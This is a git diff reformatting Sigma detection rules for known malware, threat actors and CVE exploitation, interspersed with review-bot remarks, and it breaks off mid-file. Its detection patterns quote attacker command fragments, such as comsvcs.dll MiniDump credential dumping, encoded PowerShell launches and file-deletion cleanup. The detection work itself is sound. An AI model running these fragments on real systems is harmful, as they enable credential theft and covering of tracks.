a/sigma/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml b/sigma/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml index 68ecac7c0..7d204765c 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml 
@@ -1,13 +1,12 @@ title: Pingback Backdoor Activity id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 related: - - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b - type: similar - - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 - type: similar + - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load + type: similar + - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File Indicators + type: similar status: test -description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 - as described in the trustwave report +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 @@ -26,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - config - msdtc - start diff --git a/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml b/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml index cfd19427b..bbd432ddf 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml @@ -1,8 +1,7 @@ title: Small Sieve Malware CommandLine Indicator id: 21117127-21c8-437a-ae03-4b51e5a8a088 status: test -description: Detects specific command line argument being passed to a binary as seen - being used by the malware Small Sieve. +description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) 
@@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: .exe Platypus + CommandLine|endswith: .exe Platypus condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml b/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml index 45c58bb6c..8435c429c 100644 --- a/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml +++ b/sigma/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml @@ -1,8 +1,7 @@ title: Small Sieve Malware Registry Persistence id: 65c6e3c1-fb28-4c03-a51e-84919d8185f1 status: experimental -description: Detects registry value with specific intentional typo and strings seen - used by the Small Sieve malware +description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -21,8 +20,8 @@ detection: selection_path: ObjectName|contains: \Microsoft\Windows\CurrentVersion\Run\ selection_value: - - ObjectName|contains: Microsift - - NewValue|contains: .exe Platypus + - ObjectName|contains: Microsift + - NewValue|contains: .exe Platypus condition: registry_set and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml b/sigma/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml index fa4d37b7c..f01a1996e 100644 --- a/sigma/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml +++ b/sigma/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml 
@@ -1,8 +1,7 @@ title: HAFNIUM Exchange Exploitation Activity id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7 status: test -description: Detects activity observed by different researchers to be HAFNIUM group - activity (or related) on Exchange servers +description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers references: - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ 
@@ -26,52 +25,52 @@ detection: EventID: 4688 Channel: Security selection_attrib: - CommandLine|contains|all: + CommandLine|contains|all: - attrib - ' +h ' - ' +s ' - ' +r ' - .aspx selection_vsperfmon: - - NewProcessName|contains: \ProgramData\VSPerfMon\ - - CommandLine|contains|all: - - schtasks - - VSPerfMon + - NewProcessName|contains: \ProgramData\VSPerfMon\ + - CommandLine|contains|all: + - schtasks + - VSPerfMon selection_opera_1: - NewProcessName|endswith: Opera_browser.exe + NewProcessName|endswith: Opera_browser.exe ParentProcessName|endswith: - \services.exe - \svchost.exe selection_opera_2: - NewProcessName|endswith: Users\Public\opera\Opera_browser.exe + NewProcessName|endswith: Users\Public\opera\Opera_browser.exe selection_vssadmin: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin list shadows - Temp\__output selection_makecab_1: - CommandLine|contains|all: + CommandLine|contains|all: - inetpub\wwwroot\ - .dmp.zip - NewProcessName|endswith: \makecab.exe + NewProcessName|endswith: \makecab.exe selection_makecab_2: - CommandLine|contains: + CommandLine|contains: - Microsoft\Exchange Server\ - compressionmemory - .gif - NewProcessName|endswith: \makecab.exe + NewProcessName|endswith: \makecab.exe selection_7zip: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t7z ' - C:\Programdata\pst - \it.zip selection_rundll32: - CommandLine|contains|all: + CommandLine|contains|all: - \comsvcs.dll - Minidump - 'full ' - \inetpub\wwwroot selection_other: - CommandLine|contains: + CommandLine|contains: - Windows\Temp\xx.bat - Windows\WwanSvcdcs - Windows\Temp\cw.exe diff --git a/sigma/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml b/sigma/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml index bc978cb85..7ff674180 100644 --- a/sigma/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml 
+++ b/sigma/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml @@ -1,8 +1,7 @@ title: REvil Kaseya Incident Malware Patterns id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5 status: test -description: Detects process command line patterns and locations used by REvil group - in Kaseya incident (can also match on other malware) +description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) references: - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers - https://www.joesandbox.com/analysis/443736/0/html @@ -25,7 +24,7 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: + CommandLine|contains: - C:\Windows\cert.exe - del /q /f c:\kworking\agent.crt - Kaseya VSA Agent Hot-fix @@ -35,13 +34,13 @@ detection: - c:\kworking1\agent.exe - c:\kworking1\agent.crt selection2: - NewProcessName: + NewProcessName: - C:\Windows\MsMpEng.exe - C:\Windows\cert.exe - C:\kworking\agent.exe - C:\kworking1\agent.exe selection3: - CommandLine|contains|all: + CommandLine|contains|all: - del /s /q /f - WebPages\Errors\webErrorLog.txt condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml b/sigma/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml index 980b17bfa..13615cfa6 100644 --- a/sigma/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml +++ b/sigma/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml 
@@ -23,18 +23,18 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - windows\system32\Physmem.sys - Windows\system32\ime\SHARED\WimBootConfigurations.ini - Windows\system32\ime\IMEJP\WimBootConfigurations.ini - Windows\system32\ime\IMETC\WimBootConfigurations.ini registry_image: - CommandLine|contains: reg add - NewProcessName|contains: + CommandLine|contains: reg add + NewProcessName|contains: - windows\system32\filepath2 - windows\system32\ime registry_key: - CommandLine|contains: + CommandLine|contains: - HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32 - HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32 condition: process_creation and (selection or all of registry_*) diff --git a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml index 7d506ed68..5521500b4 100644 --- a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml +++ b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml @@ -20,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \Windows\System32\mqsvc.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \mshta.exe diff --git a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml index d95f0ceb6..0b9627f8c 100644 --- a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml 
+++ b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml @@ -1,16 +1,10 @@ title: Potential CVE-2022-29072 Exploitation Attempt id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3 status: test -description: 'Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege - escalation and command execution vulnerability. - - 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) - and command execution when a file with the .7z extension is dragged to the Help>Contents - area. This is caused by misconfiguration of 7z.dll and a heap overflow. - +description: | + Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. + 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. - - ' references: - https://github.com/kagancapar/CVE-2022-29072 - https://twitter.com/kagancapar/status/1515219358234161153 @@ -29,17 +23,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_parent: ParentProcessName|endswith: \7zFM.exe filter_bat: - CommandLine|contains: + CommandLine|contains: - ' /c ' - ' /k ' - ' /r ' filter_null: - CommandLine: null + CommandLine: condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown 
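Review bot: `CommandLine:` with no value in `filter_null` resolves to YAML null exactly as the removed `CommandLine: null` did, so the `not 1 of filter_*` condition behaves the same, but a bare key reads like an unfinished edit rather than a deliberate "field is absent" match. Keeping the explicit `CommandLine: null`, or annotating the bare form as `CommandLine: # matches events where the field is absent`, makes the intent visible to the next maintainer. The same change appears in `filter_main_null` of the Sysmon execution-parent rule in the following file (`NewProcessName:`), and the same remark applies there.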
diff --git a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml index 8dcffccb7..fc80fe972 100644 --- a/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml +++ b/sigma/builtin/emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml @@ -1,8 +1,7 @@ title: Suspicious Sysmon as Execution Parent id: 6d1058a4-407e-4f3a-a144-1968c11dc5c3 status: experimental -description: Detects suspicious process executions in which Sysmon itself is the parent - of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) +description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120 - https://twitter.com/filip_dragovic/status/1590052248260055041 @@ -27,17 +26,17 @@ detection: - \Sysmon.exe - \Sysmon64.exe filter_main_generic: - NewProcessName|contains: + NewProcessName|contains: - :\Windows\Sysmon.exe - :\Windows\Sysmon64.exe - :\Windows\System32\conhost.exe - - :\Windows\System32\WerFault.exe - - :\Windows\System32\WerFaultSecure.exe + - :\Windows\System32\WerFault.exe # When Sysmon crashes + - :\Windows\System32\WerFaultSecure.exe # When Sysmon crashes - :\Windows\System32\wevtutil.exe - :\Windows\SysWOW64\wevtutil.exe - - \AppData\Local\Temp\Sysmon.exe + - \AppData\Local\Temp\Sysmon.exe # When launching Sysmon 32bit version. filter_main_null: - NewProcessName: null + NewProcessName: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown 
diff --git a/sigma/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml b/sigma/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml index 5bcebaf11..d463111cc 100644 --- a/sigma/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml +++ b/sigma/builtin/emerging-threats/2022/Malware/BlueSky-Ransomware/win_security_malware_bluesky_ransomware_files_indicators.yml @@ -1,8 +1,7 @@ title: BlueSky Ransomware Artefacts id: eee8311f-a752-44f0-bf2f-6b007db16300 status: experimental -description: Detect access to files and shares with names and extensions used by BlueSky - ransomware which could indicate a current or previous encryption attempt. +description: Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt. references: - https://unit42.paloaltonetworks.com/bluesky-ransomware/ author: j4son @@ -22,13 +21,13 @@ detection: - 4663 - 4656 selection_access_data: - - ObjectName|endswith: .bluesky - - ObjectName|contains: DECRYPT FILES BLUESKY + - ObjectName|endswith: .bluesky + - ObjectName|contains: DECRYPT FILES BLUESKY selection_share_eid: EventID: 5145 selection_share_data: - - RelativeTargetName|endswith: .bluesky - - RelativeTargetName|contains: DECRYPT FILES BLUESKY + - RelativeTargetName|endswith: .bluesky + - RelativeTargetName|contains: DECRYPT FILES BLUESKY condition: security and (all of selection_access_* or all of selection_share_*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml b/sigma/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml index ed44f576b..4bff8d5dd 100644 
--- a/sigma/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml +++ b/sigma/builtin/emerging-threats/2022/Malware/Hermetic-Wiper/proc_creation_win_malware_hermetic_wiper_activity.yml @@ -1,8 +1,7 @@ title: Hermetic Wiper TG Process Patterns id: 2f974656-6d83-4059-bbdf-68ac5403422f status: test -description: Detects process execution patterns found in intrusions related to the - Hermetic Wiper malware attacks against Ukraine in February 2022 +description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia author: Florian Roth (Nextron Systems) @@ -21,15 +20,15 @@ detection: EventID: 4688 Channel: Security selection1: - NewProcessName|endswith: \policydefinitions\postgresql.exe + NewProcessName|endswith: \policydefinitions\postgresql.exe selection2: - - CommandLine|contains: - - CSIDL_SYSTEM_DRIVE\temp\sys.tmp - - ' 1> \\\\127.0.0.1\ADMIN$\__16' - - CommandLine|contains|all: - - 'powershell -c ' - - '\comsvcs.dll MiniDump ' - - \winupd.log full + - CommandLine|contains: + - CSIDL_SYSTEM_DRIVE\temp\sys.tmp + - ' 1> \\\\127.0.0.1\ADMIN$\__16' + - CommandLine|contains|all: + - 'powershell -c ' + - '\comsvcs.dll MiniDump ' + - \winupd.log full condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml b/sigma/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml index 0c32f4b5c..232ecd0ce 100644 --- a/sigma/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml 
+++ b/sigma/builtin/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml @@ -1,8 +1,7 @@ title: Potential Raspberry Robin Dot Ending File id: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a status: test -description: Detects commandline containing reference to files ending with a "." This - scheme has been seen used by raspberry-robin +description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin author: Nasreddine Bencherchali (Nextron Systems) references: - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ @@ -19,7 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} + # Example 1: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-3f-raspberryrobin-runonce.png + # Example 2: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-5f-odbcconf.png + # Example 3: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-6f-fauppod-command-line.png + CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} # cannot match on end-of-line because of FPs with bind DNS notation condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml b/sigma/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml index 461d0162a..acaf0e817 100644 --- a/sigma/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml +++ b/sigma/builtin/emerging-threats/2022/Malware/win_mssql_sp_maggie.yml 
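Review bot: The `{1}` in `[ "']{1}` at the end of the `CommandLine|re` value is redundant — a character class already matches exactly one character — and it reads as if a specific count were intended; `CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']` is equivalent and clearer. The new trailing comment names a concrete false-positive class (bind DNS notation) while `falsepositives` still lists only `Unknown`; adding an entry such as `- Command lines containing bind DNS notation (trailing dot followed by a space or quote)` surfaces that knowledge to consumers who never read the YAML source.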
@@ -1,8 +1,7 @@
title: MSSQL Extended Stored Procedure Backdoor Maggie
id: 711ab2fe-c9ba-4746-8840-5228a58c3cb8
status: test
-description: This rule detects the execution of the extended storage procedure backdoor
- named Maggie in the context of Microsoft SQL server
+description: This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server
references:
- https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
author: Denis Szadkowski, DIRT / DCSO CyTec
diff --git a/sigma/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml b/sigma/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml
index b63e62fea..6057c3acd 100644
--- a/sigma/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml
+++ b/sigma/builtin/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml
@@ -1,8 +1,7 @@
title: Potential ACTINIUM Persistence Activity
id: e1118a8f-82f5-44b3-bb6b-8a284e5df602
status: test
-description: Detects specific process parameters as used by ACTINIUM scheduled task
- persistence creation.
+description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.
references:
- https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations
author: Andreas Hunkeler (@Karneades)
@@ -21,7 +20,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- schtasks
- create
- wscript
diff --git a/sigma/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml b/sigma/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml
index caf1ac2c6..5c0b098dc 100644
--- a/sigma/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml
+++ b/sigma/builtin/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml
@@ -20,9 +20,9 @@ detection:
EventID: 4688
Channel: Security
selection_base:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- -exec bypass -w 1 -enc
- - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA
+ - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA # Start-Job -ScriptBlock
condition: process_creation and (all of selection*)
falsepositives:
- Unknown
diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml
index ac81084f0..32d19b72f 100644
--- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml
+++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml
@@ -1,14 +1,11 @@
title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db
related:
- - id: f8987c03-4290-4c96-870f-55e75ee377f4
- type: similar
+ - id: f8987c03-4290-4c96-870f-55e75ee377f4
+ type: similar
status: experimental
-description: 'Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center
- / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g.
- create admin accounts and execute arbitrary commands.
-
- '
+description: |
+ Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
references:
- https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html
- https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment
@@ -36,12 +33,13 @@ detection:
- \tomcat9.exe
- \tomcat10.exe
selection_child:
- - NewProcessName|endswith:
- - \cmd.exe
- - \powershell.exe
- - OriginalFileName:
- - Cmd.Exe
- - PowerShell.EXE
+ # Note: Only children associated with known campaigns
+ - NewProcessName|endswith:
+ - \cmd.exe
+ - \powershell.exe
+ - OriginalFileName:
+ - Cmd.Exe
+ - PowerShell.EXE
condition: process_creation and (all of selection_*)
falsepositives:
- Unknown
diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml
index 815f9dc97..ce540193e 100644
--- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml
+++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml
@@ -1,10 +1,7 @@
title: Outlook Task/Note Reminder Received
id: fc06e655-d98c-412f-ac76-05c2698b1cb2
status: experimental
-description: Detects changes to the registry values related to outlook that indicates
- that a reminder was triggered for a Note or Task item. This could be a sign of
- exploitation of CVE-2023-23397. Further investigation is required to determine
- the success of an exploitation.
+description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
references:
- https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml
index d83e7e579..f8939caee 100644
--- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml
+++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml
@@ -1,8 +1,7 @@
title: CVE-2023-23397 Exploitation Attempt
id: 73c59189-6a6d-4b9f-a748-8f6f9bbed75c
status: experimental
-description: Detects outlook initiating connection to a WebDAV or SMB share, which
- could be a sign of CVE-2023-23397 exploitation.
+description: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
author: Robert Lee @quantum_cookie
date: 2023/03/16
modified: 2023/03/22
@@ -16,8 +15,7 @@ tags:
logsource:
service: security
product: windows
- definition: 'Requirements: SACLs must be enabled for "Query Value" on the registry
- keys used in this rule'
+ definition: 'Requirements: SACLs must be enabled for "Query Value" on the registry keys used in this rule'
detection:
security:
Channel: Security
@@ -26,16 +24,16 @@ detection:
- 4656
- 4663
ProcessName|endswith: \OUTLOOK.EXE
+ # Example: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet001\Services\WebClient\NetworkProvider
ObjectName|contains|all:
- \REGISTRY\MACHINE\SYSTEM
- Services\
ObjectName|endswith:
- WebClient\NetworkProvider
- LanmanWorkstation\NetworkProvider
- AccessList|contains: '%%4416'
+ AccessList|contains: '%%4416' # "Query key value"
condition: security and selection
falsepositives:
- - Searchprotocolhost.exe likes to query these registry keys. To avoid false postives,
- it's better to filter out those events before they reach the SIEM
+ - Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM
level: critical
ruletype: Sigma
diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml
index 5850373a4..a6a65c13c 100644
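Review bot: The example path added above `ObjectName|contains|all` names a key `CurrentControlSet001`, which is not a real SYSTEM hive key name — the live link is `CurrentControlSet` and the persisted sets are `ControlSet001`/`ControlSet002` — so an analyst tuning against the comment would look for a string that never appears in 4656/4663 events; the comment should read `# Example: \REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\WebClient\NetworkProvider` (or `ControlSet001`). The rule logic itself is unaffected because the match is on the `\REGISTRY\MACHINE\SYSTEM` and `Services\` substrings plus the `endswith` suffixes. Separately, the reflowed `falsepositives` entry on the new side still carries the typo "postives".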
--- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml
+++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-23397/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml
@@ -1,8 +1,7 @@
title: Potential CVE-2023-23397 Exploitation Attempt - SMB
id: de96b824-02b0-4241-9356-7e9b47f04bac
status: experimental
-description: Detects (failed) outbound connection attempts to internet facing SMB
- servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.
+description: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.
references:
- https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,15 +17,18 @@ detection:
smbclient_connectivity:
Channel: Microsoft-Windows-SmbClient/Connectivity
selection:
+ # Author Note: You could adapt this rule to use the "ServerName" field and uncomment the commented EventIDs. But you need to provide your own filter for "trusted server names"
EventID:
- - 30803
- - 30804
- - 30806
+ # - 30800 # The server name cannot be resolved. (Doesn't contain the "ServerAddress" field)
+ - 30803 # Failed to establish a network connection.
+ - 30804 # A network connection was disconnected.
